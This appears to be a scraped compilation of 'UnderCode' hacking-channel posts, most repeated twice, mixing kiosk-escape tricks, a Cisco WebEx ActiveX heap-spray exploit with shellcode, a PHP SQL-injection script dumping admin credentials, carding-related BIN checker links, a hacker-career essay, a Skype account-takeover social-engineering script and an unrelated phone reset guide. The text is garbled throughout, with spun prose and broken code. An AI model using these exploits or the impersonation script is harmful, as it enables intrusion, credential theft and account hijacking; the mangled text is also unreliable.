5) Input method, virtual keyboard.
6) Press the four foot disorder may occur Start menu (in this order: left and right, lower left and right)
long press somewhere, will be out of the Properties dialog box
, double-click somewhere, there will be landing interface
7) deliberately enter the wrong does not meet the business logic Data, there is a certain probability to bypass
8) Find the picture, and then long press the picture. . The effect is equivalent to the right mouse button
in general, directly run the command line is almost impossible.
Flash pages, printers, and input methods are commonly used
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Terminal skills-:
twitter.com/undercodetc
1) Command: win + R win + D ctrl + P
2) Find βaboutβ information and call IE. File, Open, C: \ WINDOWS \ system32 \ cmd.exe
3)XSS pop-up window calls IE. Such as <script> window.open (/ s /) </ script>
4) Text page, ctrl + P, printer.
5) Input method, virtual keyboard.
6) Press the four foot disorder may occur Start menu (in this order: left and right, lower left and right)
long press somewhere, will be out of the Properties dialog box
, double-click somewhere, there will be landing interface
7) deliberately enter the wrong does not meet the business logic Data, there is a certain probability to bypass
8) Find the picture, and then long press the picture. . The effect is equivalent to the right mouse button
in general, directly run the command line is almost impossible.
Flash pages, printers, and input methods are commonly used
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVE - Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
fb.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
π¦tested by undercode
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVE - Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
fb.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
π¦tested by undercode
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦This is PoC exploit-cve -sql
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
. this is PoC exploit
*/
$host = $argv[1];
$path = $argv[2];
$prefix = "qsf_"; // this is default prefix
echo
".\n ( Remote SQL Injection Exploit\n.\n".
". homepage: http://xy.wordpress.com/\n".
".\n".
". usage: php ".$argv[0]." host path\n".
". php ".$argv[0]." localhost /\n\n";
if(empty($host)||empty($path))die('# wrong host or path..');
$post_data = "query=I-like-it&forums[]=2)//limit//0//UNION//SELECT//1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1//FROM//".$prefix."users//WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";
$data = "POST ".$path."index.php?a=search HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-Type: application/x-www-undercodetest-urlencoded\r\n";
$data .= "Content-length: ".strlen($post_data)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $post_data."\r\n\r\n";
$s = @fsockopen($host, 80);
if (empty($s)) die('# wrong host..');
fputs($s, $data); $retu ='';
while(!feof($s)){
$retu .= fgets($s);
}
fclose($s);
$tmp = explode('[:!:]',$retu);
if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');
echo " " . $tmp[1] . "\n\ndone.";
?>
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦This is PoC exploit-cve -sql
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
. this is PoC exploit
*/
$host = $argv[1];
$path = $argv[2];
$prefix = "qsf_"; // this is default prefix
echo
".\n ( Remote SQL Injection Exploit\n.\n".
". homepage: http://xy.wordpress.com/\n".
".\n".
". usage: php ".$argv[0]." host path\n".
". php ".$argv[0]." localhost /\n\n";
if(empty($host)||empty($path))die('# wrong host or path..');
$post_data = "query=I-like-it&forums[]=2)//limit//0//UNION//SELECT//1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1//FROM//".$prefix."users//WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";
$data = "POST ".$path."index.php?a=search HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-Type: application/x-www-undercodetest-urlencoded\r\n";
$data .= "Content-length: ".strlen($post_data)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $post_data."\r\n\r\n";
$s = @fsockopen($host, 80);
if (empty($s)) die('# wrong host..');
fputs($s, $data); $retu ='';
while(!feof($s)){
$retu .= fgets($s);
}
fclose($s);
$tmp = explode('[:!:]',$retu);
if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');
echo " " . $tmp[1] . "\n\ndone.";
?>
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some good bin checkers websites:
> https://www.bincodes.com/bin-checker/
> https://binlist.net/
>https://binchecker.com/
>https://ccbins.pro/
>https://bin-checker.net/
>https://bincheck.org/
π¦Popular & recommended one
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some good bin checkers websites:
> https://www.bincodes.com/bin-checker/
> https://binlist.net/
>https://binchecker.com/
>https://ccbins.pro/
>https://bin-checker.net/
>https://bincheck.org/
π¦Popular & recommended one
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Bincodes
Validate, Verify & Check BIN - Bank Identification Number
Free online tools to check, verify & validate BIN (Bank Identification Number), Credit Card and Debit Card
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ someone ask, How to Easily Master Format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Safety Hard Reset?
if fond this gd article as a solution :
twitter.com/UndercodeNews
π¦ ππΌππ πππΈβπ :
A) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Software Menu:
1) Make sure the battery is charge properly
2) Turn on SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) smartphone
3) Donβt forget to backup all important data
4) Go to menu: Setting > Backup & reset > Factory Data Reset > Reset Phone
5) Choose Erase everything to continue and confirm you ready to do the format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
6) The SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) will continue the step until ready to use in clean factory default.
B) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Flashtool applications:
1) Flashtool in the applications from Sony can be download from Sony website.
2) Flashtool software need to installed in you computer and ready with USB data cable
3) Make sure SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) battery is charge properly or full charge
4) Power off SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
5) Boot SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to
6) flashmode with using: Volume Down Button and connect to USB cable at No.1 above
7) Follow the menu at you computer display, it is easy to understand the steps.
C) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Hardware Key Button:
1) Make sure the battery fully charge
2) Do not forget to backup all important data
3) Turn off the SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
4) Press and Hold together: Power Button + Volume Up Button for several seconds
5) Follow the menu at LCD screen to continue the hard reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
D) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with PC Companion Software from Computer
1) Please Make Sure the Battery not Empty
2) PC Companion is default applications for Sony Smartphone which can be download from Sony Website
3) After install at our computer, open PC Companion Applications
Before connect to phone, please choose Phone Update and follow several step at PC Companion
4) At some menu, PC Companion will tell us how to connect the phone with PC Companion using USB cable and press the Volume Down button
5) Finish the PC Companion step and until it doing Factory Reset to SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to factory default Android operating system.
@undercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ someone ask, How to Easily Master Format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Safety Hard Reset?
if fond this gd article as a solution :
twitter.com/UndercodeNews
π¦ ππΌππ πππΈβπ :
A) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Software Menu:
1) Make sure the battery is charge properly
2) Turn on SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) smartphone
3) Donβt forget to backup all important data
4) Go to menu: Setting > Backup & reset > Factory Data Reset > Reset Phone
5) Choose Erase everything to continue and confirm you ready to do the format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
6) The SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) will continue the step until ready to use in clean factory default.
B) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Flashtool applications:
1) Flashtool in the applications from Sony can be download from Sony website.
2) Flashtool software need to installed in you computer and ready with USB data cable
3) Make sure SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) battery is charge properly or full charge
4) Power off SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
5) Boot SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to
6) flashmode with using: Volume Down Button and connect to USB cable at No.1 above
7) Follow the menu at you computer display, it is easy to understand the steps.
C) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Hardware Key Button:
1) Make sure the battery fully charge
2) Do not forget to backup all important data
3) Turn off the SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
4) Press and Hold together: Power Button + Volume Up Button for several seconds
5) Follow the menu at LCD screen to continue the hard reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)
D) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with PC Companion Software from Computer
1) Please Make Sure the Battery not Empty
2) PC Companion is default applications for Sony Smartphone which can be download from Sony Website
3) After install at our computer, open PC Companion Applications
Before connect to phone, please choose Phone Update and follow several step at PC Companion
4) At some menu, PC Companion will tell us how to connect the phone with PC Companion using USB cable and press the Volume Down button
5) Finish the PC Companion step and until it doing Factory Reset to SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to factory default Android operating system.
@undercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
X (formerly Twitter)
UNDERCODE NEWS (@UndercodeNews) on X
π¦ Latest in Cyber & Tech News with AI-Powered Analysis and Fact Checking.
γjoin us: https://t.co/YVv330UsjQ
More: @DailyCve @UndercodeUpdate
γjoin us: https://t.co/YVv330UsjQ
More: @DailyCve @UndercodeUpdate
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The most classic hacking tutorial (security skills) by UnderCode :
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
The behavior of hackers mainly includes the following :
1) Learning technology:
γγOnce new technologies appear on the Internet, hackers must learn immediately and master the technology in the shortest time. The mastering here is not general understanding, but Read the relevant "RFC" and understand the mechanism of this technology. Otherwise, if you stop learning, then relying on what he has previously mastered, you will not be able to maintain his "hacker status" for more than a year.
γγThe knowledge that junior hackers need to learn is more difficult, because they have no foundation, so they need to be exposed to a lot of basic content. However, today's Internet brings a lot of information to readers, which requires junior learners to choose: too Deep content may make learning difficult; too "fancy" content is not useful for learning hackers. Therefore, beginners should not be too greedy, they should try to find a book and their own complete textbooks, and study them step by step.
2) Masquerade:
γγEvery act of a hacker will be recorded by the server, so the hacker must disguise himself so that the other party cannot distinguish his true identity. This requires skilled skills to masquerade his IP address, use springboards to evade tracking, and clean up records Disturb clues, avoid firewalls, and more.
γγCamouflage requires very good basic skills to achieve it. This is a "big game" for beginners, which means that it is impossible for beginners to learn camouflage in a short time, so I do not encourage beginners to use their own learning Knowledge attacks the network, otherwise, once your actions are revealed, you will eventually harm yourself.
γγIf one day you become a real hacker, I also don't approve of your attack on the network. After all, the growth of a hacker is a learning, not a crime.
3) Vulnerability discovery:
γγVulnerabilities are the most important information for hackers. Hackers must often learn from other people's discovered vulnerabilities, and strive to find unknown vulnerabilities by themselves, and find valuable and exploitable vulnerabilities from a large number of vulnerabilities for testing. , Of course, their ultimate goal is to destroy or patch this vulnerability through a vulnerability.
>γHackers βobsession with finding vulnerabilities is unthinkable. Their slogan says" break authority ". From time to time, hackers have proved this with their actual actions. There is no" no Vulnerable "program. In the eyes of a hacker, the so-called "seamless" is simply "not found".
4) Exploiting loopholes:
γγFor decent hackers, the loopholes need to be patched; for evil hackers, the loopholes are used for sabotage. And their basic premise is to "exploit vulnerabilities". Hackers can use vulnerabilities to do the following things:
γγ
1) Obtain system information: Some vulnerabilities can leak system information and expose sensitive information, thereby further invading the system;
γγ
2) Invading the system: entering through vulnerabilities Inside the system, or get the internal data on the server, or completely control the server;
γγ
3) Find the next target: A victory means the emergence of the next target, and a hacker should make full use of the server that he already controls as a tool to find and invade the next System;
γγ
4) Do some good things: After the decent hackers finish the above work, they will fix the vulnerabilities or notify the system administrator to
γγdo some things to maintain network security; 5. Do some bad things: the evil hackers are doing the above work Later, it will be judged whether the server still has utilization value. If there is use value, they will implant Trojans or backdoors on the server for the next visit; and they will never show mercy to servers that have no use value, and the system crash will make them feel unlimited pleasure!
@UnderCodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The most classic hacking tutorial (security skills) by UnderCode :
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
The behavior of hackers mainly includes the following :
1) Learning technology:
γγOnce new technologies appear on the Internet, hackers must learn immediately and master the technology in the shortest time. The mastering here is not general understanding, but Read the relevant "RFC" and understand the mechanism of this technology. Otherwise, if you stop learning, then relying on what he has previously mastered, you will not be able to maintain his "hacker status" for more than a year.
γγThe knowledge that junior hackers need to learn is more difficult, because they have no foundation, so they need to be exposed to a lot of basic content. However, today's Internet brings a lot of information to readers, which requires junior learners to choose: too Deep content may make learning difficult; too "fancy" content is not useful for learning hackers. Therefore, beginners should not be too greedy, they should try to find a book and their own complete textbooks, and study them step by step.
2) Masquerade:
γγEvery act of a hacker will be recorded by the server, so the hacker must disguise himself so that the other party cannot distinguish his true identity. This requires skilled skills to masquerade his IP address, use springboards to evade tracking, and clean up records Disturb clues, avoid firewalls, and more.
γγCamouflage requires very good basic skills to achieve it. This is a "big game" for beginners, which means that it is impossible for beginners to learn camouflage in a short time, so I do not encourage beginners to use their own learning Knowledge attacks the network, otherwise, once your actions are revealed, you will eventually harm yourself.
γγIf one day you become a real hacker, I also don't approve of your attack on the network. After all, the growth of a hacker is a learning, not a crime.
3) Vulnerability discovery:
γγVulnerabilities are the most important information for hackers. Hackers must often learn from other people's discovered vulnerabilities, and strive to find unknown vulnerabilities by themselves, and find valuable and exploitable vulnerabilities from a large number of vulnerabilities for testing. , Of course, their ultimate goal is to destroy or patch this vulnerability through a vulnerability.
>γHackers βobsession with finding vulnerabilities is unthinkable. Their slogan says" break authority ". From time to time, hackers have proved this with their actual actions. There is no" no Vulnerable "program. In the eyes of a hacker, the so-called "seamless" is simply "not found".
4) Exploiting loopholes:
γγFor decent hackers, the loopholes need to be patched; for evil hackers, the loopholes are used for sabotage. And their basic premise is to "exploit vulnerabilities". Hackers can use vulnerabilities to do the following things:
γγ
1) Obtain system information: Some vulnerabilities can leak system information and expose sensitive information, thereby further invading the system;
γγ
2) Invading the system: entering through vulnerabilities Inside the system, or get the internal data on the server, or completely control the server;
γγ
3) Find the next target: A victory means the emergence of the next target, and a hacker should make full use of the server that he already controls as a tool to find and invade the next System;
γγ
4) Do some good things: After the decent hackers finish the above work, they will fix the vulnerabilities or notify the system administrator to
γγdo some things to maintain network security; 5. Do some bad things: the evil hackers are doing the above work Later, it will be judged whether the server still has utilization value. If there is use value, they will implant Trojans or backdoors on the server for the next visit; and they will never show mercy to servers that have no use value, and the system crash will make them feel unlimited pleasure!
@UnderCodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
π¦ From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.
A) 1) Learn a certain amount of English:
γγLearning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.
2) Learn to use basic software:
γγThe basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.
3) Preliminary understanding of network protocols and working principles: The
γγso-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.
4) Familiar with several popular programming languages ββand scripts:
γγAs mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ββand know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ββInitially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ββContact, so long as you are proficient in one of them, other languages ββcan be the same, it is recommended to learn C language and htm hypertext language.
π¦ How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
π¦ From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.
A) 1) Learn a certain amount of English:
γγLearning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.
2) Learn to use basic software:
γγThe basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.
3) Preliminary understanding of network protocols and working principles: The
γγso-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.
4) Familiar with several popular programming languages ββand scripts:
γγAs mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ββand know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ββInitially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ββContact, so long as you are proficient in one of them, other languages ββcan be the same, it is recommended to learn C language and htm hypertext language.
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
B) 1) Familiar with network applications:
γγNetwork applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
γγNetwork applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
>Mental faculties
>Skype
>Quick-thinking
>Social Skills (Minimum hard work required)
π¦ Process
1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;
2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account
3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.
4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.
5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;
π¦6) web page link
Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.
7) Transcript
Daring = Skype |Italics = Me personally
βHi I have ignored my private data regarding my Skype bank account! β
βOh, My partner and i see. Iβd always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? β
βMy Skype title is usually βbobβ in addition to la and orange county bobβ
βThank anyone.
π¦ So that you can assist you We need you to definitely supply the using details:
1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances listβ
1) β Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5β
βThank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? β
βSure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recallβ
βThank anyone make sure you reset to zero your own private data in this article; linkβ
βI donβt have access to in which mail any longer thatβs exactly why Iβm getting in contact with youβ
βWhat can be your new email address contact info? β
βItβs Bob@bobber. bobβ
βThank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? β
βThanks greatly, Zero thatβs alright l8rs: )β
Transcript Conclude
π¦hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
>Mental faculties
>Skype
>Quick-thinking
>Social Skills (Minimum hard work required)
π¦ Process
1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;
2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account
3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.
4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.
5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;
π¦6) web page link
Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.
7) Transcript
Daring = Skype |Italics = Me personally
βHi I have ignored my private data regarding my Skype bank account! β
βOh, My partner and i see. Iβd always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? β
βMy Skype title is usually βbobβ in addition to la and orange county bobβ
βThank anyone.
π¦ So that you can assist you We need you to definitely supply the using details:
1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances listβ
1) β Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5β
βThank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? β
βSure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recallβ
βThank anyone make sure you reset to zero your own private data in this article; linkβ
βI donβt have access to in which mail any longer thatβs exactly why Iβm getting in contact with youβ
βWhat can be your new email address contact info? β
βItβs Bob@bobber. bobβ
βThank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? β
βThanks greatly, Zero thatβs alright l8rs: )β
Transcript Conclude
Facebook
UndercOde Testing Company
UndercOde Testing Company. 97 likes Β· 3 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
Right now this can seem to be a good practice nonetheless it isn't and yes it generally builds up an actual individual interconnection concerning anyone plus the particular person you're talking too, with good signals, good grammar in addition to using recommendations meticulously there is certainly virtually any 99% potential for anyone having this.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β